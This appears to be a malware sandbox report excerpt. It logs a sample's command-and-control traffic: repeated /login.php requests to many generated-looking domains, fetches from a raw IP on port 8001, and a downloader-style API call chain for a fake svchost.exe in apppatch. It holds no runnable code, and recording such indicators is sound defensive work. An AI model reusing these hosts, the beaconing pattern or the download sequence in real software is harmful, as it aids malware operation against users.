    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA4AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_02CA4AB0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww1.lysyfyj.comConnection: Keep-AliveCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
